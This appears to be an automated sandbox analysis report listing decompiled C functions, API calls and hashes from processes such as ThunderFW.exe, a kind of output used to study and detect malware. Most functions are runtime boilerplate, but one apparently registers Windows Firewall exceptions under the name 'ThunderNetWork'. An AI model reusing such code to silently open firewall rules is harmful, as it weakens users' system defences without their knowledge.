					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 0x10)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				 *((intOrPtr*)(_t42 + 0x14)) = _t33;
				return _t42;
			}





                                                                                                                                                0x004075a6
                                                                                                                                                0x004075b0
                                                                                                                                                0x004075b6
                                                                                                                                                0x004075bc
                                                                                                                                                0x004075c1
                                                                                                                                                0x004075c3
                                                                                                                                                0x004075c9
                                                                                                                                                0x004075cf
                                                                                                                                                0x004075d5
                                                                                                                                                0x004075db
                                                                                                                                                0x004075e1
                                                                                                                                                0x004075eb
                                                                                                                                                0x004075ee
                                                                                                                                                0x004075f1
                                                                                                                                                0x004075f7
                                                                                                                                                0x00407601
                                                                                                                                                0x0040760f
                                                                                                                                                0x00407621
                                                                                                                                                0x00407611
                                                                                                                                                0x00407611
                                                                                                                                                0x00407614
                                                                                                                                                0x00407616
                                                                                                                                                0x00407619
                                                                                                                                                0x0040761c
                                                                                                                                                0x0040761c
                                                                                                                                                0x00407623
                                                                                                                                                0x00407625
                                                                                                                                                0x00407628
                                                                                                                                                0x00407630
                                                                                                                                                0x00407642
                                                                                                                                                0x00407632
                                                                                                                                                0x00407632
                                                                                                                                                0x00407635
                                                                                                                                                0x00407637
                                                                                                                                                0x0040763a
                                                                                                                                                0x0040763d
                                                                                                                                                0x0040763d
                                                                                                                                                0x00407644
                                                                                                                                                0x00407646
                                                                                                                                                0x00407649
                                                                                                                                                0x00407651
                                                                                                                                                0x00407663
                                                                                                                                                0x00407653
                                                                                                                                                0x00407653
                                                                                                                                                0x00407656
                                                                                                                                                0x00407658
                                                                                                                                                0x0040765b
                                                                                                                                                0x0040765e
                                                                                                                                                0x0040765e
                                                                                                                                                0x00407665
                                                                                                                                                0x00407667
                                                                                                                                                0x0040766a
                                                                                                                                                0x00407672
                                                                                                                                                0x00407684
                                                                                                                                                0x00407674
                                                                                                                                                0x00407674
                                                                                                                                                0x00407677
                                                                                                                                                0x00407679
                                                                                                                                                0x0040767c
                                                                                                                                                0x0040767f
                                                                                                                                                0x0040767f
                                                                                                                                                0x00407687
                                                                                                                                                0x0040768d

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                • Opcode ID: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
                                                                                                                                                • Instruction ID: 6ad8090dc912b32accdf13bb09e5540cd70d669e40ded14db292eecac2a9bd8b
                                                                                                                                                • Opcode Fuzzy Hash: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
                                                                                                                                                • Instruction Fuzzy Hash: 7F31B2B0945B018ED7648F2BC484A56FAE8BF90310F2589AFD15ADB2B1D7F99440CF15
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406264, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00406264(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E0040562D(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E0040562D(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                                                                                0x0040626f
                                                                                                                                                0x00406271
                                                                                                                                                0x00406276
                                                                                                                                                0x00406279
                                                                                                                                                0x0040627c
                                                                                                                                                0x0040627f
                                                                                                                                                0x00406283
                                                                                                                                                0x00406286
                                                                                                                                                0x0040628a
                                                                                                                                                0x0040628d
                                                                                                                                                0x00406290
                                                                                                                                                0x004062a0
                                                                                                                                                0x00406292
                                                                                                                                                0x00406294
                                                                                                                                                0x00406294
                                                                                                                                                0x004062a6
                                                                                                                                                0x004062ac
                                                                                                                                                0x004062b0
                                                                                                                                                0x004062b3
                                                                                                                                                0x004062c4
                                                                                                                                                0x004062b5
                                                                                                                                                0x004062b7
                                                                                                                                                0x004062b7
                                                                                                                                                0x004062db
                                                                                                                                                0x004062e6
                                                                                                                                                0x004062f3
                                                                                                                                                0x004062f6
                                                                                                                                                0x004062fd
                                                                                                                                                0x00406303

                                                                                                                                                APIs
                                                                                                                                                • wcslen.MSVCRT ref: 00406271
                                                                                                                                                • free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,74B04E00,?,00000000), ref: 00406294
                                                                                                                                                  • Part of subcall function 0040562D: malloc.MSVCRT ref: 00405649
                                                                                                                                                  • Part of subcall function 0040562D: memcpy.MSVCRT ref: 00405661
                                                                                                                                                  • Part of subcall function 0040562D: free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,74B04E00,?,00000000), ref: 0040566A
                                                                                                                                                • free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,74B04E00,?,00000000), ref: 004062B7
                                                                                                                                                • memcpy.MSVCRT ref: 004062DB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 726966127-0
                                                                                                                                                • Opcode ID: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
                                                                                                                                                • Instruction ID: 328e5c77b206eb01c5c4dd085cb03c2c4ac654035e51f3c9fb1ea2fb7f212fdc
                                                                                                                                                • Opcode Fuzzy Hash: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
                                                                                                                                                • Instruction Fuzzy Hash: 3A21AEB1600704EFC730EF19D881C9AB7F9EF483247104A2EF856A7291D775B925CB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Analysis Process: ThunderFW.exe PID: 1036 Parent PID: 2124 ThunderFW.exeCOMMON

                                                                                                                                                Executed Functions

                                                                                                                                                Function 00BF1372, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191comCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                			E00BF1372(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr _t96;
				intOrPtr* _t97;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t109;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr* _t119;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t133;
				void* _t135;
				void* _t163;
				void* _t166;
				signed int _t167;
				intOrPtr* _t169;

				_t167 = 0;
				_v16 = 0x80004005;
				_v24 = 0;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_v28 = E00BF80F0(__edx, _a4);
				_v32 = E00BF80F0(__edx, "ThunderNetWork");
				_t85 = E00BF80F0(__edx, _a8);
				_v36 = _t85;
				__imp__CoInitializeEx(0, 2, _t166); // executed
				_v40 = _t85;
				if(_t85 == 0x80010106 || _t85 >= 0) {
					_t87 = E00BF1058( &_v24,  &_v24);
					_v16 = _t87;
					if(_t87 >= _t167) {
						_t95 = _v24;
						_t96 =  *((intOrPtr*)( *_t95 + 0x48))(_t95,  &_v20);
						_v16 = _t96;
						if(_t96 >= _t167) {
							_t97 = _v24;
							_t98 =  *((intOrPtr*)( *_t97 + 0x1c))(_t97,  &_v12);
							_v16 = _t98;
							if(_t98 >= _t167) {
								if((_v12 & 0x00000004) != 0 && _v12 != 4) {
									_v12 = _v12 ^ 0x00000004;
								}
								_t169 = __imp__CoCreateInstance;
								_t100 =  *_t169(0xbfdb2c, _t167, 1, 0xbfdb3c,  &_v8, _t163, _t135); // executed
								_v16 = _t100;
								if(_t100 >= 0) {
									_t101 = _v8;
									 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v28);
									_t103 = _v8;
									 *((intOrPtr*)( *_t103 + 0x28))(_t103, _v32);
									_t105 = _v8;
									 *((intOrPtr*)( *_t105 + 0x30))(_t105, _v36);
									_t107 = _v8;
									 *((intOrPtr*)( *_t107 + 0x40))(_t107, 6);
									_t109 = _v8;
									 *((intOrPtr*)( *_t109 + 0x98))(_t109, _v12);
									_t111 = _v8;
									 *((intOrPtr*)( *_t111 + 0xa8))(_t111, 1);
									_t113 = _v8;
									 *((intOrPtr*)( *_t113 + 0x88))(_t113, 0xffffffff);
									_t115 = _v20;
									 *((intOrPtr*)( *_t115 + 0x20))(_t115, _v8);
									_t118 =  *_t169(0xbfdb2c, 0, 1, 0xbfdb3c,  &_v8);
									_v16 = _t118;
									if(_t118 >= 0) {
										_t119 = _v8;
										 *((intOrPtr*)( *_t119 + 0x20))(_t119, _v28);
										_t121 = _v8;
										 *((intOrPtr*)( *_t121 + 0x28))(_t121, _v32);
										_t123 = _v8;
										 *((intOrPtr*)( *_t123 + 0x30))(_t123, _v36);
										_t125 = _v8;
										 *((intOrPtr*)( *_t125 + 0x40))(_t125, 0x11);
										_t127 = _v8;
										 *((intOrPtr*)( *_t127 + 0x98))(_t127, _v12);
										_t129 = _v8;
										 *((intOrPtr*)( *_t129 + 0xa8))(_t129, 1);
										_t131 = _v8;
										 *((intOrPtr*)( *_t131 + 0x88))(_t131, 0xffffffff);
										_t133 = _v20;
										_v16 =  *((intOrPtr*)( *_t133 + 0x20))(_t133, _v8);
									}
								}
								_t167 = 0;
							}
						}
					}
				}
				_t88 = _v8;
				if(_t88 != _t167) {
					 *((intOrPtr*)( *_t88 + 8))(_t88);
				}
				_t89 = _v20;
				if(_t89 != _t167) {
					 *((intOrPtr*)( *_t89 + 8))(_t89);
				}
				_t90 = _v24;
				if(_t90 != _t167) {
					 *((intOrPtr*)( *_t90 + 8))(_t90);
				}
				if(_v40 >= _t167) {
					__imp__CoUninitialize(); // executed
				}
				return _v16;
			}












































                                                                                                                                                0x00bf137c
                                                                                                                                                0x00bf137e
                                                                                                                                                0x00bf1385
                                                                                                                                                0x00bf1388
                                                                                                                                                0x00bf138b
                                                                                                                                                0x00bf138e
                                                                                                                                                0x00bf139b
                                                                                                                                                0x00bf13a6
                                                                                                                                                0x00bf13a9
                                                                                                                                                0x00bf13b1
                                                                                                                                                0x00bf13b4
                                                                                                                                                0x00bf13ba
                                                                                                                                                0x00bf13c2
                                                                                                                                                0x00bf13d0
                                                                                                                                                0x00bf13d8
                                                                                                                                                0x00bf13db
                                                                                                                                                0x00bf13e1
                                                                                                                                                0x00bf13eb
                                                                                                                                                0x00bf13f0
                                                                                                                                                0x00bf13f3
                                                                                                                                                0x00bf13f9
                                                                                                                                                0x00bf1403
                                                                                                                                                0x00bf1408
                                                                                                                                                0x00bf140b
                                                                                                                                                0x00bf1415
                                                                                                                                                0x00bf141d
                                                                                                                                                0x00bf141d
                                                                                                                                                0x00bf1430
                                                                                                                                                0x00bf143c
                                                                                                                                                0x00bf143e
                                                                                                                                                0x00bf1443
                                                                                                                                                0x00bf1449
                                                                                                                                                0x00bf1452
                                                                                                                                                0x00bf1455
                                                                                                                                                0x00bf145e
                                                                                                                                                0x00bf1461
                                                                                                                                                0x00bf146a
                                                                                                                                                0x00bf146d
                                                                                                                                                0x00bf1475
                                                                                                                                                0x00bf1478
                                                                                                                                                0x00bf1481
                                                                                                                                                0x00bf1487
                                                                                                                                                0x00bf148f
                                                                                                                                                0x00bf1495
                                                                                                                                                0x00bf149d
                                                                                                                                                0x00bf14a3
                                                                                                                                                0x00bf14ac
                                                                                                                                                0x00bf14b9
                                                                                                                                                0x00bf14bb
                                                                                                                                                0x00bf14c0
                                                                                                                                                0x00bf14c2
                                                                                                                                                0x00bf14cb
                                                                                                                                                0x00bf14ce
                                                                                                                                                0x00bf14d7
                                                                                                                                                0x00bf14da
                                                                                                                                                0x00bf14e3
                                                                                                                                                0x00bf14e6
                                                                                                                                                0x00bf14ee
                                                                                                                                                0x00bf14f1
                                                                                                                                                0x00bf14fa
                                                                                                                                                0x00bf1500
                                                                                                                                                0x00bf1508
                                                                                                                                                0x00bf150e
                                                                                                                                                0x00bf1516
                                                                                                                                                0x00bf151c
                                                                                                                                                0x00bf1528
                                                                                                                                                0x00bf1528
                                                                                                                                                0x00bf14c0
                                                                                                                                                0x00bf152c
                                                                                                                                                0x00bf152e
                                                                                                                                                0x00bf140b
                                                                                                                                                0x00bf13f3
                                                                                                                                                0x00bf13db
                                                                                                                                                0x00bf152f
                                                                                                                                                0x00bf1534
                                                                                                                                                0x00bf1539
                                                                                                                                                0x00bf1539
                                                                                                                                                0x00bf153c
                                                                                                                                                0x00bf1541
                                                                                                                                                0x00bf1546
                                                                                                                                                0x00bf1546
                                                                                                                                                0x00bf1549
                                                                                                                                                0x00bf154e
                                                                                                                                                0x00bf1553
                                                                                                                                                0x00bf1553
                                                                                                                                                0x00bf155a
                                                                                                                                                0x00bf155c
                                                                                                                                                0x00bf155c
                                                                                                                                                0x00bf1566

                                                                                                                                                APIs
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF1391
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF139E
                                                                                                                                                  • Part of subcall function 00BF80F0: lstrlenA.KERNEL32(?,F1C81C65,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF8137
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF814D
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF815C
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00BF1112,00000000), ref: 00BF81EB
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,000000FE,?,00BF1112,00000000), ref: 00BF8206
                                                                                                                                                  • Part of subcall function 00BF80F0: SysAllocString.OLEAUT32(00000000), ref: 00BF8221
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF13A9
                                                                                                                                                  • Part of subcall function 00BF80F0: _malloc.LIBCMT ref: 00BF81A1
                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000002,80004005,ThunderNetWork,?), ref: 00BF13B4
                                                                                                                                                • CoCreateInstance.OLE32(00BFDB2C,00000000,00000001,00BFDB3C,?), ref: 00BF143C
                                                                                                                                                • CoCreateInstance.OLE32(00BFDB2C,00000000,00000001,00BFDB3C,?), ref: 00BF14B9
                                                                                                                                                • CoUninitialize.OLE32 ref: 00BF155C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Convert_com_util::$ByteCharCreateErrorInstanceLastMultiWide$AllocInitializeUninitialize_malloclstrlen
                                                                                                                                                • String ID: ThunderNetWork
                                                                                                                                                • API String ID: 3644708077-3075295172
                                                                                                                                                • Opcode ID: ea38d002e499012a1a132940d87f84e47fe6c45783d47f7da4060beaa6763368
                                                                                                                                                • Instruction ID: a0a7adb2544a5f9cfa2271715c53c632d8563faf6b4ca7afa8b0ac35ad3d5ea5
                                                                                                                                                • Opcode Fuzzy Hash: ea38d002e499012a1a132940d87f84e47fe6c45783d47f7da4060beaa6763368
                                                                                                                                                • Instruction Fuzzy Hash: C371C675A00219EFCB00DFE4C888AAEBBB9FF49714F204899F505EB251CB359A45DF50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF74CC, Relevance: 6.1, APIs: 4, Instructions: 93memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                			E00BF74CC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t21;
				long _t23;
				long _t24;
				void* _t25;
				long _t31;
				signed int _t32;
				signed int _t33;
				signed int _t39;
				signed int _t45;
				long _t49;
				void* _t52;
				void* _t53;

				_push(0xc);
				_push(0xbfdec8);
				E00BF3F70(__ebx, __edi, __esi);
				_t39 =  *(_t52 + 8);
				if(_t39 <= 0) {
					L4:
					_t49 = _t39 *  *(_t52 + 0xc);
					 *(_t52 + 8) = _t49;
					__eflags = _t49;
					if(_t49 == 0) {
						_t49 = 1;
						__eflags = 1;
					}
					do {
						_t38 = 0;
						 *(_t52 - 0x1c) = 0;
						__eflags = _t49 - 0xffffffe0;
						if(_t49 > 0xffffffe0) {
							L13:
							__eflags = _t38;
							if(_t38 != 0) {
								L21:
								_t21 = _t38;
								L22:
								return E00BF3FB5(_t21);
							}
							__eflags =  *0xc00a20; // 0x0
							if(__eflags == 0) {
								__eflags = _t38;
								if(_t38 == 0) {
									_t23 =  *(_t52 + 0x10);
									__eflags = _t23;
									if(_t23 != 0) {
										 *_t23 = 0xc;
									}
								}
								goto L21;
							}
							goto L15;
						}
						__eflags =  *0xc00a98 - 3;
						if( *0xc00a98 != 3) {
							L11:
							__eflags = _t38;
							if(_t38 != 0) {
								goto L21;
							}
							L12:
							_t25 = RtlAllocateHeap( *0xc0093c, 8, _t49); // executed
							_t38 = _t25;
							goto L13;
						}
						_t49 = _t49 + 0x0000000f & 0xfffffff0;
						 *(_t52 + 0xc) = _t49;
						__eflags =  *(_t52 + 8) -  *0xc00a84; // 0x0
						if(__eflags > 0) {
							goto L11;
						}
						E00BF3C3D(0, 4);
						 *((intOrPtr*)(_t52 - 4)) = 0;
						_push( *(_t52 + 8));
						 *(_t52 - 0x1c) = E00BF6CFF();
						 *((intOrPtr*)(_t52 - 4)) = 0xfffffffe;
						E00BF75C8();
						_t38 =  *(_t52 - 0x1c);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L12;
						}
						E00BF4E20(0, _t38, 0,  *(_t52 + 8));
						_t53 = _t53 + 0xc;
						goto L11;
						L15:
						_t24 = E00BF45B5(_t49);
						__eflags = _t24;
					} while (_t24 != 0);
					_t31 =  *(_t52 + 0x10);
					__eflags = _t31;
					if(_t31 != 0) {
						 *_t31 = 0xc;
					}
					L3:
					_t21 = 0;
					goto L22;
				}
				_t32 = 0xffffffe0;
				_t33 = _t32 / _t39;
				_t45 = _t32 % _t39;
				asm("sbb eax, eax");
				_t58 = _t33 + 1;
				if(_t33 + 1 != 0) {
					goto L4;
				} else {
					 *((intOrPtr*)(E00BF38CA(_t58))) = 0xc;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00BF3862(_t45, 0, __esi);
					goto L3;
				}
			}















                                                                                                                                                0x00bf74cc
                                                                                                                                                0x00bf74ce
                                                                                                                                                0x00bf74d3
                                                                                                                                                0x00bf74d8
                                                                                                                                                0x00bf74df
                                                                                                                                                0x00bf750f
                                                                                                                                                0x00bf7513
                                                                                                                                                0x00bf7515
                                                                                                                                                0x00bf7518
                                                                                                                                                0x00bf751a
                                                                                                                                                0x00bf751e
                                                                                                                                                0x00bf751e
                                                                                                                                                0x00bf751e
                                                                                                                                                0x00bf751f
                                                                                                                                                0x00bf751f
                                                                                                                                                0x00bf7521
                                                                                                                                                0x00bf7524
                                                                                                                                                0x00bf7527
                                                                                                                                                0x00bf7592
                                                                                                                                                0x00bf7592
                                                                                                                                                0x00bf7594
                                                                                                                                                0x00bf75e2
                                                                                                                                                0x00bf75e2
                                                                                                                                                0x00bf75e4
                                                                                                                                                0x00bf75e9
                                                                                                                                                0x00bf75e9
                                                                                                                                                0x00bf7596
                                                                                                                                                0x00bf759c
                                                                                                                                                0x00bf75d1
                                                                                                                                                0x00bf75d3
                                                                                                                                                0x00bf75d5
                                                                                                                                                0x00bf75d8
                                                                                                                                                0x00bf75da
                                                                                                                                                0x00bf75dc
                                                                                                                                                0x00bf75dc
                                                                                                                                                0x00bf75da
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf75d3
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf759c
                                                                                                                                                0x00bf7529
                                                                                                                                                0x00bf7530
                                                                                                                                                0x00bf757d
                                                                                                                                                0x00bf757d
                                                                                                                                                0x00bf757f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf7581
                                                                                                                                                0x00bf758a
                                                                                                                                                0x00bf7590
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf7590
                                                                                                                                                0x00bf7535
                                                                                                                                                0x00bf7538
                                                                                                                                                0x00bf753e
                                                                                                                                                0x00bf7544
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf7548
                                                                                                                                                0x00bf754e
                                                                                                                                                0x00bf7551
                                                                                                                                                0x00bf755a
                                                                                                                                                0x00bf755d
                                                                                                                                                0x00bf7564
                                                                                                                                                0x00bf7569
                                                                                                                                                0x00bf756c
                                                                                                                                                0x00bf756e
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf7575
                                                                                                                                                0x00bf757a
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf759e
                                                                                                                                                0x00bf759f
                                                                                                                                                0x00bf75a5
                                                                                                                                                0x00bf75a5
                                                                                                                                                0x00bf75ad
                                                                                                                                                0x00bf75b0
                                                                                                                                                0x00bf75b2
                                                                                                                                                0x00bf75b8
                                                                                                                                                0x00bf75b8
                                                                                                                                                0x00bf7508
                                                                                                                                                0x00bf7508
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf7508
                                                                                                                                                0x00bf74e3
                                                                                                                                                0x00bf74e6
                                                                                                                                                0x00bf74e6
                                                                                                                                                0x00bf74eb
                                                                                                                                                0x00bf74ed
                                                                                                                                                0x00bf74ee
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf74f0
                                                                                                                                                0x00bf74f5
                                                                                                                                                0x00bf74fb
                                                                                                                                                0x00bf74fc
                                                                                                                                                0x00bf74fd
                                                                                                                                                0x00bf74fe
                                                                                                                                                0x00bf74ff
                                                                                                                                                0x00bf7500
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf7505

                                                                                                                                                APIs
                                                                                                                                                • __lock.LIBCMT ref: 00BF7548
                                                                                                                                                • ___sbh_alloc_block.LIBCMT ref: 00BF7554
                                                                                                                                                • _memset.LIBCMT ref: 00BF7575
                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00BFDEC8,0000000C,00BF5589,00000000,?,00000000,00000000,00000000,?,00BF334F,00000001,00000214,?,00000000), ref: 00BF758A
                                                                                                                                                  • Part of subcall function 00BF38CA: __getptd_noexit.LIBCMT ref: 00BF38CA
                                                                                                                                                  • Part of subcall function 00BF3862: __decode_pointer.LIBCMT ref: 00BF386D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocateHeap___sbh_alloc_block__decode_pointer__getptd_noexit__lock_memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3771094184-0
                                                                                                                                                • Opcode ID: 3edd295fbf6c85fe205cc7b0ccea85c1936c386913fb9d38ac9a29108e489361
                                                                                                                                                • Instruction ID: e41001daefa7fe63058ca3b943ed4b2633cee1ecb565439300dc5a44c0d2554c
                                                                                                                                                • Opcode Fuzzy Hash: 3edd295fbf6c85fe205cc7b0ccea85c1936c386913fb9d38ac9a29108e489361
                                                                                                                                                • Instruction Fuzzy Hash: 9F21F570A8860D9BCB11AF68DC80A7D77E1FB60750F2542D5FA159B1D1DF308E49CB40
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF2087, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00BF2087(int _a4) {

				E00BF205C(_a4);
				ExitProcess(_a4);
			}



                                                                                                                                                0x00bf208f
                                                                                                                                                0x00bf2098

                                                                                                                                                APIs
                                                                                                                                                • ___crtCorExitProcess.LIBCMT ref: 00BF208F
                                                                                                                                                  • Part of subcall function 00BF205C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00BF2094,00000000,?,00BF740E,000000FF,0000001E,?,00BF553F,00000000,00000001,00000000,?,00BF3BC7,00000018), ref: 00BF2066
                                                                                                                                                  • Part of subcall function 00BF205C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BF2076
                                                                                                                                                • ExitProcess.KERNEL32 ref: 00BF2098
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2427264223-0
                                                                                                                                                • Opcode ID: a5c17a9cc363b7e2e7141d6fd5cbf5725f351ece54aebe5a247c7103e8496624
